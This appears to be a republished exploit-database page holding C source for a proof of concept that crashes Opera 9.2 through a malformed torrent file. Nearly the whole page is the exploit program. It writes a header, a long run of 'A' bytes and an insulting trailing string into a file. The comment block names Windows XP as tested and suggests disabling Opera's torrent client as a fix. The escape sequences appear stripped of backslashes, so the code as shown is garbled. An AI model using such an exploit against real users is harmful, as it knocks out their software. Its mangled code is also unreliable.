Opera 9.2 (torrent File) Remote Denial of Service Exploit

Exploit Code :

/************************************************************************

* Created Date :April 23 2007
*
* Credits go to n00b for finding this vulnerability and writing p0c.
* Moderator of http://igniteds.net
*
* 0pera 9.2 torrent file remote dos exploit.
*
* opera has its own bit torrent client with-in the web browser
* it is possible to crash opera with a malformed torrent file
* causing denial of service to legitimate users..Opera will
* use 100% cpu till the inevitable happens..Which will be a crash
* To fix this problem disable the bitorrent with in opera..
*
* Tested : win xp service pack 1 and 2
*
* I wasn't able to catch any debugging info I'm afraid maybe some one
* else can give it a go.
*
* All i was able to get from drwatson pmsl was.
************************************************************************

* Application exception occurred:
* App: C:Program FilesOperaOpera.exe (pid=1084)
* When: 4/22/2007 @ 14:55:29.296
* Exception number: 80000003 (hard coded breakpoint)
************************************************************************

* Seams like some sort of memory leak with the bitorrent client
* of opera..
************************************************************************

********************************
**/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void usage(char* file);

char header[] = "x64x38";

char My_buff[] =
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41";

char trailing_buff[] =
"x36x31x3ax09x44x69x65x20x6fx70x65x72x61"
"x20x79x6fx75x20x73x6cx75x74";

int main(int argc,char* argv[])
{
system("cls");

printf("n *************************************************");
printf("n * Opera torrent file dos exploit by n00b *");
printf("n *************************************************");
printf("n * Shouts to every one at milw0rm *");
printf("n *************************************************");
printf("n * Special thanks to str0ke *");
printf("n * *");
printf("n * Date :Aprill 23 2007 *");
printf("n *************************************************");
printf("n * CREDITS TO n00b FOR FINDING THIS BUG *");
printf("n *************************************************");

if ( argc!=2 )
{
usage(argv[0]);
}

FILE *f;
f = fopen(argv[1],"w");
if ( !f )
{
printf("nFuck some thing went wrong :D");
exit(1);
}

printf("nnMaking torrent file...");

fwrite(header,1,sizeof(header),f);

fwrite(My_buff,1,sizeof(My_buff),f);

fwrite(trailing_buff,1,sizeof(trailing_buff),f);

printf("nDone hoooooha!");
printf("n ");
printf("n0h noes memory leak pmsl !!");
return 0;
}

void usage(char* file)
{

printf("nnusage: n00b.exe opera.torrent");
exit(1);
}

Security

IT News

Search

SecurityAlert Database

About SecurityAlert

ExploitAlert Database

SecurityReason Research

WLB Database

Send to WLB

About WLB

Security Audit

Schedule

Prices of services

Contact

SecurityReason IT News

SecurityAlert

World Laboratory of Bugtraq

ExploitAlert

Apache

PHP

Contact

About SecurityReason